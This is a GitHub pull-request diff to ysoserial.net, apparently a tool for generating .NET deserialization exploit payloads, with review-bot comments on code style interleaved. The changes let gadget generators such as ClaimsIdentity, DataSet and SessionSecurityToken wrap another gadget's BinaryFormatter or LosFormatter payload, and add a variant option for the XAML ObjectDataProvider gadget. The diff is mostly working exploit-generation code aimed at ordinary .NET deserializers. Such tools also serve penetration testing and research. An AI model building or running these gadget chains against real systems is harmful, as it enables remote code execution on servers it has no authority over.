Merge pull request #140 from irsdl/master
adding a feature & general updates
irsdl authored Nov 17, 2022
2 parents abfbfe7 + f359691 commit 78b366e
Showing 18 changed files with 466 additions and 75 deletions.
55 changes: 49 additions & 6 deletions README.md


30 changes: 25 additions & 5 deletions ysoserial/Generators/ActivitySurrogateDisableTypeCheck.cs
@@ -1,4 +1,5 @@
using System.Collections.Generic;
using NDesk.Options;
using System.Collections.Generic;
using ysoserial.Helpers;

namespace ysoserial.Generators
Expand All @@ -22,14 +23,26 @@ public override string Finders()

public override List<string> Labels()
{
return new List<string> { GadgetTypes.BridgeAndDerived };
return new List<string> { GadgetTypes.NotBridgeButDervied };
}

public override List<string> SupportedFormatters()
{
return new List<string> { "BinaryFormatter", "SoapFormatter", "NetDataContractSerializer", "LosFormatter" };
}

int variant_number = 1;

public override OptionSet Options()
{
OptionSet options = new OptionSet()
{
{"var|variant=", "Choices: 1 -> use TypeConfuseDelegateGenerator [default], 2 -> use TextFormattingRunPropertiesMarshal", v => int.TryParse(v, out variant_number) },
};

return options;
}

public override object Generate(string formatter, InputArgs inputArgs)
{
string xaml_payload = @"<ResourceDictionary
Expand Down Expand Up @@ -62,12 +75,19 @@ public override object Generate(string formatter, InputArgs inputArgs)
</ObjectDataProvider.MethodParameters>
</ObjectDataProvider>
</ResourceDictionary>";

object payload = TypeConfuseDelegateGenerator.GetXamlGadget(xaml_payload);

if (inputArgs.Minify)
{

xaml_payload = XmlMinifier.Minify(xaml_payload, null, null);
}

object payload;
if (variant_number == 1)
{
payload = TypeConfuseDelegateGenerator.GetXamlGadget(xaml_payload);
}
else
{
payload = new TextFormattingRunPropertiesMarshal(xaml_payload);
}

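Review bot: The `variant` option callback `v => int.TryParse(v, out variant_number)` leaves `variant_number` at 0 when the value is not an integer, so `--variant=abc` silently takes the `else` branch of `Generate` (TextFormattingRunPropertiesMarshal) instead of the documented default 1, and any integer other than 1 or 2 is likewise accepted and treated as variant 2. I would validate inside the callback and reject bad input, e.g. `v => { if (!int.TryParse(v, out variant_number) || (variant_number != 1 && variant_number != 2)) throw new OptionException("variant must be 1 or 2", "variant"); }`. A short comment on the `variant_number` field, `// 1 = TypeConfuseDelegate XAML gadget (default), 2 = TextFormattingRunPropertiesMarshal; set by Options()`, would also help, since the field is presumably written by option parsing before `Generate` runs. `Generate` continues past the hunk.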
17 changes: 15 additions & 2 deletions ysoserial/Generators/AxHostStateGenerator.cs
Expand Up @@ -34,11 +34,24 @@ public override List<string> SupportedFormatters()
return new List<string> { "BinaryFormatter", "SoapFormatter", "LosFormatter", "NetDataContractSerializer"};
}

public override string SupportedBridgedFormatter()
{
return Formatters.BinaryFormatter;
}

public override object Generate(string formatter, InputArgs inputArgs)
{
byte[] binaryFormatterPayload;
if (BridgedPayload != null)
{
binaryFormatterPayload = (byte[])BridgedPayload;
}
else
{
IGenerator generator = new TextFormattingRunPropertiesGenerator();
binaryFormatterPayload = (byte[])generator.GenerateWithNoTest("BinaryFormatter", inputArgs); // we could have used AxHostStateGeneratorGadget directly here but it wouldn't have passed our other potential filters using the user input
}

IGenerator generator = new TextFormattingRunPropertiesGenerator();
byte[] binaryFormatterPayload = (byte[])generator.GenerateWithNoTest("BinaryFormatter", inputArgs); // we could have used AxHostStateGeneratorGadget directly here but it wouldn't have passed our other potential filters using the user input
string b64encoded = Convert.ToBase64String(binaryFormatterPayload);

AxHostStateMarshal payloadAxHostMarshal = new AxHostStateMarshal(Convert.FromBase64String(b64encoded));
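Review bot: The bridged-payload block — `byte[] binaryFormatterPayload; if (BridgedPayload != null) { binaryFormatterPayload = (byte[])BridgedPayload; } else { ...generate... }` — is copied verbatim into ClaimsIdentityGenerator, ClaimsPrincipalGenerator, DataSetGenerator, DataSetTypeSpoofGenerator, RolePrincipalGenerator, SessionSecurityTokenGenerator, SessionViewStateHistoryItemGenerator and ToolboxItemContainerGenerator in this same commit. All of them derive from GenericGenerator, which owns `BridgedPayload`, so one protected helper there taking the fallback as a `Func<byte[]>` and doing the cast once would remove nine copies and give a single place to turn a non-`byte[]` `BridgedPayload` into a descriptive `InvalidOperationException` instead of a bare InvalidCastException; the call site here becomes `binaryFormatterPayload = GetBridgedPayloadOr(() => (byte[])new TextFormattingRunPropertiesGenerator().GenerateWithNoTest("BinaryFormatter", inputArgs));`. Nothing in these hunks checks that the bridged bytes were produced with the formatter `SupportedBridgedFormatter()` declares, so unless the caller enforces that (it is not visible here) a payload from another formatter would be embedded unchanged. `Generate` continues past the hunk.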
20 changes: 17 additions & 3 deletions ysoserial/Generators/ClaimsIdentityGenerator.cs
Expand Up @@ -29,12 +29,26 @@ public override List<string> Labels()
return new List<string> { GadgetTypes.BridgeAndDerived, "OnDeserialized" };
}

public override string SupportedBridgedFormatter()
{
return Formatters.BinaryFormatter;
}

public override object Generate(string formatter, InputArgs inputArgs)
{
IGenerator generator = new TextFormattingRunPropertiesGenerator();
byte[] binaryFormatterPayload = (byte[])generator.GenerateWithNoTest("BinaryFormatter", inputArgs);
string b64encoded = Convert.ToBase64String(binaryFormatterPayload);

byte[] binaryFormatterPayload;
if (BridgedPayload != null)
{
binaryFormatterPayload = (byte[])BridgedPayload;
}
else
{
IGenerator generator = new TextFormattingRunPropertiesGenerator();
binaryFormatterPayload = (byte[])generator.GenerateWithNoTest("BinaryFormatter", inputArgs);
}

var b64encoded = Convert.ToBase64String(binaryFormatterPayload);

if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase)
|| formatter.Equals("losformatter", StringComparison.OrdinalIgnoreCase))
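Review bot: `var b64encoded = Convert.ToBase64String(binaryFormatterPayload);` on the new side switches the declaration to `var`, while the identical line in the other generators touched by this commit (ClaimsPrincipal, DataSet, RolePrincipal, SessionSecurityToken, ToolboxItemContainer) keeps `string b64encoded`; the file already used `string` before the change, so I would keep `string b64encoded = Convert.ToBase64String(binaryFormatterPayload);`. There are also two consecutive blank lines between the new `if`/`else` and that declaration where one would do. `Generate` continues past the hunk.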
20 changes: 17 additions & 3 deletions ysoserial/Generators/ClaimsPrincipalGenerator.cs
Expand Up @@ -30,13 +30,27 @@ public override string Finders()

public override List<string> Labels()
{
return new List<string> { GadgetTypes.BridgeAndDerived, "OnDeserialized" };
return new List<string> { GadgetTypes.BridgeAndDerived, "OnDeserialized" , "SecondOrderDeserialization"};
}

public override string SupportedBridgedFormatter()
{
return Formatters.BinaryFormatter;
}

public override object Generate(string formatter, InputArgs inputArgs)
{
byte[] rceGadget = (byte[])(new TypeConfuseDelegateGenerator()).GenerateWithNoTest("BinaryFormatter", inputArgs);
string b64encoded = Convert.ToBase64String(rceGadget);
byte[] binaryFormatterPayload;
if (BridgedPayload != null)
{
binaryFormatterPayload = (byte[]) BridgedPayload;
}
else
{
binaryFormatterPayload = (byte[]) (new TypeConfuseDelegateGenerator()).GenerateWithNoTest("BinaryFormatter", inputArgs);
}

string b64encoded = Convert.ToBase64String(binaryFormatterPayload);

if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase)
|| formatter.Equals("losformatter", StringComparison.OrdinalIgnoreCase))
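Review bot: The new lines in this file are spaced differently from the same code in the sibling generators: `(byte[]) BridgedPayload` and `(byte[]) (new TypeConfuseDelegateGenerator())` carry a space after the cast, and the new label list reads `"OnDeserialized" , "SecondOrderDeserialization"}`. I would write `binaryFormatterPayload = (byte[])BridgedPayload;` and `return new List<string> { GadgetTypes.BridgeAndDerived, "OnDeserialized", "SecondOrderDeserialization" };` to match AxHostStateGenerator and the rest of the commit. `Generate` continues past the hunk.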
18 changes: 15 additions & 3 deletions ysoserial/Generators/DataSetGenerator.cs
Expand Up @@ -34,12 +34,24 @@ public override List<string> SupportedFormatters()
return new List<string> { "BinaryFormatter", "SoapFormatter", "LosFormatter"};
}

public override object Generate(string formatter, InputArgs inputArgs)
public override string SupportedBridgedFormatter()
{
return Formatters.BinaryFormatter;
}

byte[] init_payload = (byte[]) new TextFormattingRunPropertiesGenerator().GenerateWithNoTest("BinaryFormatter", inputArgs);
public override object Generate(string formatter, InputArgs inputArgs)
{
byte[] binaryFormatterPayload;
if (BridgedPayload != null)
{
binaryFormatterPayload = (byte[])BridgedPayload;
}
else
{
binaryFormatterPayload = (byte[])new TextFormattingRunPropertiesGenerator().GenerateWithNoTest("BinaryFormatter", inputArgs);
}

DataSetMarshal payloadDataSetMarshal = new DataSetMarshal(init_payload);
DataSetMarshal payloadDataSetMarshal = new DataSetMarshal(binaryFormatterPayload);

if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase)
|| formatter.Equals("losformatter", StringComparison.OrdinalIgnoreCase)
25 changes: 22 additions & 3 deletions ysoserial/Generators/DataSetTypeSpoofGenerator.cs
Expand Up @@ -20,11 +20,30 @@ public override string Contributors()
return "Soroush Dalili, Markus Wulftange, Jang";
}

public override string AdditionalInfo()
{
return "A more advanced type spoofing which can use any arbtirary types can be seen in TestingArenaHome::SpoofByBinaryFormatterJson";
}

public override string SupportedBridgedFormatter()
{
return Formatters.BinaryFormatter;
}

public override object Generate(string formatter, InputArgs inputArgs)
{
byte[] init_payload =
(byte[]) new TextFormattingRunPropertiesGenerator().GenerateWithNoTest("BinaryFormatter", inputArgs);
DataSetSpoofMarshal payloadDataSetMarshal = new DataSetSpoofMarshal(init_payload);
byte[] binaryFormatterPayload;
if (BridgedPayload != null)
{
binaryFormatterPayload = (byte[])BridgedPayload;
}
else
{
binaryFormatterPayload = (byte[])new TextFormattingRunPropertiesGenerator().GenerateWithNoTest("BinaryFormatter", inputArgs);
}


DataSetSpoofMarshal payloadDataSetMarshal = new DataSetSpoofMarshal(binaryFormatterPayload);
if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase)
|| formatter.Equals("losformatter", StringComparison.OrdinalIgnoreCase)
|| formatter.Equals("soapformatter", StringComparison.OrdinalIgnoreCase))
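Review bot: The new `AdditionalInfo()` text misspells "arbitrary" as `arbtirary`, and since this string is shown to the user (presumably in the help output) it should read `"A more advanced type spoofing which can use any arbitrary types can be seen in TestingArenaHome::SpoofByBinaryFormatterJson"`. There are also two consecutive blank lines between the `else` block and the `DataSetSpoofMarshal` construction on the new side. `Generate` continues past the hunk.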
8 changes: 8 additions & 0 deletions ysoserial/Generators/GenericGenerator.cs
Expand Up @@ -20,6 +20,13 @@ public abstract class GenericGenerator : IGenerator
public abstract string Finders();
public abstract string Name();
public abstract List<string> SupportedFormatters();

// This is used when we want a gadget to support incoming from another gadget
public virtual string SupportedBridgedFormatter()
{
return Formatters.None;
}
public object BridgedPayload { get; set ;}

public virtual string AdditionalInfo()
{
Expand Down Expand Up @@ -275,5 +282,6 @@ public object Serialize(object payloadObj, string formatter, InputArgs inputArgs
}
}


}
}
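Review bot: The new `SupportedBridgedFormatter()` and `BridgedPayload` members carry only a one-line `//` comment and no contract on the property at all, even though every override in this commit casts it straight to `byte[]`. I would replace the comment with XML docs: on the method, `/// <summary>Formatter whose serialized output this gadget accepts from another gadget via <see cref="BridgedPayload"/>; <see cref="Formatters.None"/> when bridging is not supported.</summary>`, and on the property, `/// <summary>Serialized output of another gadget, produced with the formatter named by <see cref="SupportedBridgedFormatter"/>. When non-null, <c>Generate</c> embeds it instead of building its own inner payload; all current overrides expect a <c>byte[]</c>.</summary>`. `{ get; set ;}` should be `{ get; set; }`, and the blank line added at the end of the class in the second hunk is stray whitespace.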
25 changes: 23 additions & 2 deletions ysoserial/Generators/IGenerator.cs
Expand Up @@ -14,6 +14,8 @@ public interface IGenerator
string Contributors();
List<string> Labels();
List<string> SupportedFormatters();
string SupportedBridgedFormatter();
object BridgedPayload { get; set; }
object Generate(string formatter, InputArgs inputArgs);
object GenerateWithInit(string formatter, InputArgs inputArgs);
object GenerateWithNoTest(string formatter, InputArgs inputArgs);
Expand All @@ -29,10 +31,29 @@ public interface IGenerator
public static class GadgetTypes
{
public const string
NotBridgeNotDerived = "Not bridge or derived",
NotBridgeNotDerived = "Not bridge or derived",
NotBridgeButDervied = "Not bridge but derived", // Bridge has dervied meaning in it too
BridgeAndDerived = "Bridge and dervied",
Dummy = "It relies on other gadgets and is not a real gadget on its own (not bridged or derived either)", // We hide these in normal help as they are only valuable for research purposes - example is ResourceSet
None="";
None = "";
}

public static class Formatters
{
public const string
BinaryFormatter = "BinaryFormatter",
LosFormatter = "LosFormatter",
SoapFormatter = "SoapFormatter",
NetDataContractSerializer = "NetDataContractSerializer",
DataContractSerializer = "DataContractSerializer",
FastJson = "FastJson",
FsPickler = "FsPickler",
JavaScriptSerializer = "JavaScriptSerializer",
JsonNet = "Json.Net",
SharpSerializerBinary = "SharpSerializerBinary",
Xaml = "Xaml",
XmlSerializer = "XmlSerializer",
YamlDotNet = "YamlDotNet",
None = "";
}
}
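Review bot: The new `Formatters` constants are used only by the `SupportedBridgedFormatter()` overrides; the `SupportedFormatters()` lists (`"BinaryFormatter", "SoapFormatter", ...`) and the `GenerateWithNoTest("BinaryFormatter", ...)` calls in the generators touched by this same commit still spell the names as literals, so the value a bridge is matched on and the value a formatter is selected by can drift apart without a compile error. Replacing those literals with `Formatters.BinaryFormatter` and friends in the touched files would close that gap. The `JsonNet = "Json.Net"` value is the only entry whose string differs from its identifier; if formatter names are compared against user input elsewhere (not visible here), that spelling needs to match what the comparison expects. The pre-existing `NotBridgeButDervied`/`"dervied"` spellings in `GadgetTypes` are left as they were; note the identifier is now referenced from ActivitySurrogateDisableTypeCheck in this commit, so a rename would touch that line too.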
18 changes: 16 additions & 2 deletions ysoserial/Generators/RolePrincipalGenerator.cs
Expand Up @@ -27,10 +27,24 @@ public override List<string> Labels()
return new List<string> { GadgetTypes.BridgeAndDerived };
}

public override string SupportedBridgedFormatter()
{
return Formatters.BinaryFormatter;
}

public override object Generate(string formatter, InputArgs inputArgs)
{
IGenerator generator = new TextFormattingRunPropertiesGenerator();
byte[] binaryFormatterPayload = (byte[])generator.GenerateWithNoTest("BinaryFormatter", inputArgs);
byte[] binaryFormatterPayload;
if (BridgedPayload != null)
{
binaryFormatterPayload = (byte[])BridgedPayload;
}
else
{
IGenerator generator = new TextFormattingRunPropertiesGenerator();
binaryFormatterPayload = (byte[])generator.GenerateWithNoTest("BinaryFormatter", inputArgs);
}

string b64encoded = Convert.ToBase64String(binaryFormatterPayload);

var payloadClaimsPrincipalMarshal = new RolePrincipalMarshal(b64encoded);
18 changes: 16 additions & 2 deletions ysoserial/Generators/SessionSecurityTokenGenerator.cs
Expand Up @@ -38,6 +38,11 @@ public override List<string> Labels()
return new List<string> { GadgetTypes.BridgeAndDerived };
}

public override string SupportedBridgedFormatter()
{
return Formatters.BinaryFormatter;
}

private string GetB64SessionToken(string b64encoded)
{
var obj = new SessionSecurityTokenMarshal(b64encoded);
Expand All @@ -49,8 +54,17 @@ private string GetB64SessionToken(string b64encoded)

public override object Generate(string formatter, InputArgs inputArgs)
{
IGenerator generator = new TextFormattingRunPropertiesGenerator();
byte[] binaryFormatterPayload = (byte[])generator.GenerateWithNoTest("BinaryFormatter", inputArgs);
byte[] binaryFormatterPayload;
if (BridgedPayload != null)
{
binaryFormatterPayload = (byte[])BridgedPayload;
}
else
{
IGenerator generator = new TextFormattingRunPropertiesGenerator();
binaryFormatterPayload = (byte[])generator.GenerateWithNoTest("BinaryFormatter", inputArgs);
}

string b64encoded = Convert.ToBase64String(binaryFormatterPayload);

if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase)
19 changes: 17 additions & 2 deletions ysoserial/Generators/SessionViewStateHistoryItemGenerator.cs
Expand Up @@ -30,6 +30,11 @@ public override List<string> Labels()
return new List<string> { GadgetTypes.BridgeAndDerived };
}

public override string SupportedBridgedFormatter()
{
return Formatters.LosFormatter;
}

private string GetB64SessionToken(string b64encoded)
{
var obj = new SessionViewStateHistoryItemMarshal(b64encoded);
Expand All @@ -41,8 +46,18 @@ private string GetB64SessionToken(string b64encoded)

public override object Generate(string formatter, InputArgs inputArgs)
{
IGenerator generator = new TextFormattingRunPropertiesGenerator();
string losFormatterText = Encoding.UTF8.GetString((byte[])generator.GenerateWithNoTest("LosFormatter", inputArgs));
byte[] losFormatterPayload;
if (BridgedPayload != null)
{
losFormatterPayload = (byte[])BridgedPayload;
}
else
{
IGenerator generator = new TextFormattingRunPropertiesGenerator();
losFormatterPayload = (byte[])generator.GenerateWithNoTest("LosFormatter", inputArgs);
}

string losFormatterText = Encoding.UTF8.GetString(losFormatterPayload);

if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase)
|| formatter.Equals("losformatter", StringComparison.OrdinalIgnoreCase))
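Review bot: This is the only generator in the commit whose bridged input is LosFormatter output (`SupportedBridgedFormatter()` returns `Formatters.LosFormatter`), and `Generate` decodes `BridgedPayload` with `Encoding.UTF8.GetString`; a BinaryFormatter blob handed in by mistake would pass the `byte[]` cast and be decoded into replacement characters and embedded silently. A comment on the cast, `// bridged input must be the raw UTF-8 LosFormatter output (see SupportedBridgedFormatter), not BinaryFormatter bytes`, states the expectation at the point where it matters. `Generate` continues past the hunk.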
21 changes: 18 additions & 3 deletions ysoserial/Generators/ToolboxItemContainerGenerator.cs
Expand Up @@ -31,15 +31,30 @@ public override List<string> Labels()
return new List<string> { GadgetTypes.BridgeAndDerived };
}

public override string SupportedBridgedFormatter()
{
return Formatters.BinaryFormatter;
}

public override object Generate(string formatter, InputArgs inputArgs)
{
byte[] gadget = (byte[]) SerializeWithNoTest(TextFormattingRunPropertiesGenerator.TextFormattingRunPropertiesGadget(inputArgs), "binaryformatter", inputArgs);
string b64encoded = Convert.ToBase64String(gadget);
byte[] binaryFormatterPayload;
if (BridgedPayload != null)
{
binaryFormatterPayload = (byte[])BridgedPayload;
}
else
{
IGenerator generator = new TextFormattingRunPropertiesGenerator();
binaryFormatterPayload = (byte[])SerializeWithNoTest(TextFormattingRunPropertiesGenerator.TextFormattingRunPropertiesGadget(inputArgs), "binaryformatter", inputArgs);
}

string b64encoded = Convert.ToBase64String(binaryFormatterPayload);

if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase)
|| formatter.Equals("losformatter", StringComparison.OrdinalIgnoreCase))
{
var obj = new ToolboxItemContainerMarshal(gadget);
var obj = new ToolboxItemContainerMarshal(binaryFormatterPayload);
return Serialize(obj, formatter, inputArgs);
}
else if (formatter.ToLower().Equals("soapformatter"))
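Review bot: `IGenerator generator = new TextFormattingRunPropertiesGenerator();` in the new `else` branch is unused — the next line calls the static `TextFormattingRunPropertiesGenerator.TextFormattingRunPropertiesGadget(inputArgs)` and `SerializeWithNoTest` directly — so it allocates a generator for nothing and will draw an unused-variable warning; drop the line. Unlike the sibling generators in this commit, the fallback here goes through `SerializeWithNoTest(..., "binaryformatter", inputArgs)` rather than `GenerateWithNoTest("BinaryFormatter", inputArgs)`, which is pre-existing but now sits beside the shared bridged pattern and deserves a one-line comment on why it differs. The pre-existing `formatter.ToLower().Equals("soapformatter")` on the last context line is also inconsistent with the `StringComparison.OrdinalIgnoreCase` checks just above it. `Generate` continues past the hunk.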
